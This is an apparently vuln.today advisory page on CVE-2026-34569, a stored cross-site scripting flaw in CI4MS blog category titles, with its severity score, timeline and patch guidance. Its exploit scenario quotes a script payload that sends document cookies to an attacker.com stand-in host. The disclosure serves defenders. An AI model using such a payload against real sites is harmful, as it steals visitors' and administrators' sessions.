What is the CVSS score of CVE-2026-34569?

CVE-2026-34569 has a CVSS 3.1 base score of 9.9 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. EPSS exploitation probability: 0.0%.

Which versions of Ci4ms are affected by CVE-2026-34569?

CI4MS versions prior to 0.31.0.0 contain a stored cross-site scripting vulnerability in blog category management that allows authenticated users to inject malicious code affecting public-facing blog…. A patch is available.

How to fix or mitigate CVE-2026-34569?

Within 24 hours: Inventory all CI4MS instances and document current versions. Within 7 days: Apply vendor-released patch to version 0.31.0.0 across all affected systems; test in staging environment first. Within 30 days: Conduct access review of authenticated users with blog category management permissions; implement additional input validation and output encoding controls as defense-in-depth.

Ci4ms CVE-2026-34569

EUVD-2026-18084 CRITICAL

Cross-site Scripting (XSS) (CWE-79)

2026-04-01 GitHub_M

GHSA-fhrf-q333-82fm

XSS Ci4ms

9.9

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

9.9 CRITICAL

AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Patch released

Apr 02, 2026 - 02:30 nvd

Patch available

EUVD ID Assigned

Apr 01, 2026 - 22:16 euvd

EUVD-2026-18084

Analysis Generated

Apr 01, 2026 - 22:16 vuln.today

CVE Published

Apr 01, 2026 - 21:29 nvd

CRITICAL 9.9

DescriptionGitHub Advisory

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog categories. An attacker can inject a malicious JavaScript payload into the category title field, which is then stored server-side. This stored payload is later rendered unsafely across public-facing blog category pages, administrative interfaces, and blog post views without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.

AnalysisAI

Stored cross-site scripting in CI4MS blog category management allows authenticated users to inject malicious JavaScript that executes across multiple application contexts including public blog pages and administrative interfaces. Affecting all versions prior to 0.31.0.0, attackers with low-privilege authenticated access can achieve scope change with high impact to confidentiality, integrity, and availability (CVSS 9.9). …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Authenticate to CI4MS application

Delivery

Inject JavaScript payload in blog category title field

Exploit

Payload stored in database

Execution

Unsafely rendered on public pages and admin interfaces

Persist

Execute arbitrary JavaScript in user browsers

Impact

Steal session cookies or admin credentials

Access

Authenticate to CI4MS application

Delivery

Inject JavaScript payload in blog category title field

Exploit

Payload stored in database

Execution

Unsafely rendered on public pages and admin interfaces

Persist

Execute arbitrary JavaScript in user browsers

Impact

Steal session cookies or admin credentials

Vulnerability AssessmentAI

Exploitation	Authenticated user with blog category creation/editing privileges in CI4MS versions prior to 0.31.0.0. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 9.9 Critical rating reflects genuine severity driven by scope change and the multi-context impact of stored XSS in a CMS environment. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker with low-privilege authenticated access to a CI4MS installation navigates to the blog category management interface and creates a new category with title containing a stored XSS payload such as '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'. The application stores this unsanitized input in the database. …
Remediation	Upgrade immediately to CI4MS version 0.31.0.0, which includes comprehensive input sanitization and output encoding fixes for the blog category management functionality. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all CI4MS instances and document current versions. …

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-34569 vulnerability details – vuln.today

Back

Ci4ms CVE-2026-34569

Severity by source

CVSS VectorGitHub Advisory

Lifecycle Timeline

DescriptionGitHub Advisory

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

Share

External POC / Exploit Code